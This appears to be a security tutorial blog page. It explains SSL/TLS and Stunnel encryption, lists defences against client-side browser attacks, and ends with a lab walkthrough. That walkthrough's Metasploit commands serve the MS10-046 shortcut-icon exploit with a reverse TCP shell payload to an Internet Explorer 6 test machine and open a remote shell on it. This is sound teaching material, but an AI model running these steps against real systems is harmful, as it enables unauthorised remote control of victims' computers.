If you want to send a protected message across a computer network, to be sure that in the event your message is intercepted by an unwanted recipient that it cannot be read or tampered with, then you need to add network encryption.
SSL (Secure Sockets Layer) and its successor TLS (Transport Layer Security) are protocols that function at the Application Layer of the TCP/IP Model, above the Transport Layer and provides security certificates, public and private key exchange (asymmetric cryptography), and encryption.
Stunnel
Stunnel is a program that can wrap unencrypted traffic in SSL/TLS encryption and forward it to a specified service or port. Stunnel can be configured to accept packets on an incoming port, encrypt that traffic with SSL or TLS encryption, and then forward the encrypted packets to another specified destination IP address and port. Stunnel uses OpenSSL to encrypt network traffic.
Lab Demo
In this demo, I will use Stunnel to send a secure communication between two clients, both running Stunnel. Client A will run Stunnel in client mode and Client B will be running Stunnel in server mode (see below).
Video Tutorials
In the video tutorials below, I demonstrate step-by-step, the entire process of getting Stunnel to work between a Backtrack Linux client and a Windows XP Pro client.
Client side exploits are an extremely common form of attack. A typical scenario is an attacker compromises an ecommerce website and then use that website as a proxy to launch attacks on unsuspecting website visitors.
How many of us have received viruses from a malicious webpage and website? More often than not, the owner of the website does not know that the website contains malicious code that is attacking its visitors. In these scenarios the target of the exploit is the user's web browser.
The role of the web browser has expanded with the role of the web. Web browsers today are required to do much more than present static text and images, web browsers process ecommerce transactions, interact with databases, launch media players, and transfer files. As such, the web and the web browser, was not designed with security in mind. What this means is that the web browser is an opportune target to focus attacks.
Client-side Defense
So how do you protect yourself and your browser from a client-side attack? Here is a list of best practices to protect against client side attacks:
update and run an antivirus program and antispyware program,
update your operating system and web browsers on a regular basis,
update media players (eg. Flash, Quicktime), readers (eg. Acrobat), and add-ons regularly
update Java
do not visit nefarious websites (eg. sites that deal with pirated music and warez)
Do not surf the web as an administrator, by making sure to have User Account Control (UAC) enabled in Vista or Windows 7. Windows XP users can use the program Drop My Rights to achieve the same result: click here to learn more
Client-side Attack
In the video tutorial below, a client-side exploit is tested against a lab computer running Windows XP Pro and Internet Explorer 6. In order to facilitate the attack, I use Metasploit to launch a webserver and serve a malicious webpage to the visiting IE6 web browser.
Demo steps:
Launch msfconsole, load the exploit and payload, set the options and launch the exploiting webserver and webpage. see the following commands:
1. #msfconsole
2. msf > search browser
3. msf > use windows/browser/ms10_046_shortcut_icon_dllloader
4. msf > show payloads
5. msf > set payload generic/shell_reverse_tcp
6. msf > show options
7. msf > set lhost <your ip address>
8. msf > set srvhost <your ip address>
9. msf > set srvport 80
10. msf > exploit
11. On your test client (victim computer) browse to your metasploit server's IP address, launching the client side atttack.
12. Once the exploit has finished launching list your sessions: msf > sessions -l
13. msf > sessions -i 1
14. you should now have a Windows shell to interact with
